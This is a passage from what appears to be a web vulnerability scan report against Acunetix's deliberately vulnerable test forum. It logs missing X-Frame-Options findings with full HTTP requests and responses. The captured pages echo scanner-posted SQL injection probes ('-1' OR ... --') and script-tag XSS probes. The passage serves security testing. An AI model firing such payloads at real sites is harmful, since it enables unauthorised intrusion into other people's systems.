GET http://testasp.vulnweb.com/showthread.asp?id=31 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:42 GMT Content-Length: 4207 |
Response Body - size: 4,207 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum -1' OR 2+737-737-1=0+0+0+1 -- </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D31" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/-1' OR 2+737-737-1=0+0+0+1 -- </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:51 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>-1' OR 2+737-737-1=0+0+0+1 -- - 104.156.249.56</div><div class='posttext'>555</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=32 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 345 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=32 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:42 GMT Content-Length: 4255 |
Response Body - size: 4,255 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum "acxzzzzzzzzbbbccccdddeeexca".replace("z","o") </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D32" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/"acxzzzzzzzzbbbccccdddeeexca".replace("z","o") </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:51 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>"acxzzzzzzzzbbbccccdddeeexca".replace("z","o") - 104.156.249.56</div><div class='posttext'>555</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=33 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 345 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=33 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:42 GMT Content-Length: 4207 |
Response Body - size: 4,207 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum -1' OR 3+737-737-1=0+0+0+1 -- </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D33" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/-1' OR 3+737-737-1=0+0+0+1 -- </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:51 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>-1' OR 3+737-737-1=0+0+0+1 -- - 104.156.249.56</div><div class='posttext'>555</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=34 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 345 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=34 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:42 GMT Content-Length: 4165 |
Response Body - size: 4,165 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Mr. </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D34" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Mr. </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:52 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Mr. - 104.156.249.56</div><div class='posttext'>555'"()&%<acx><ScRiPt >V7NV(9847)</ScRiPt></div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=35 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 345 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=35 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:42 GMT Content-Length: 4201 |
Response Body - size: 4,201 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum -1' OR 3*2<(0+5+737-737) -- </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D35" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/-1' OR 3*2<(0+5+737-737) -- </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:52 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>-1' OR 3*2<(0+5+737-737) -- - 104.156.249.56</div><div class='posttext'>555</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=36 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 345 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=36 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:42 GMT Content-Length: 4162 |
Response Body - size: 4,162 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Mr. </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D36" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Mr. </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:52 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Mr. - 104.156.249.56</div><div class='posttext'>'"()&%<acx><ScRiPt >V7NV(9478)</ScRiPt></div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=37 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 345 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=37 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:42 GMT Content-Length: 4201 |
Response Body - size: 4,201 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum -1' OR 3*2>(0+5+737-737) -- </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D37" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/-1' OR 3*2>(0+5+737-737) -- </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:52 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>-1' OR 3*2>(0+5+737-737) -- - 104.156.249.56</div><div class='posttext'>555</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- 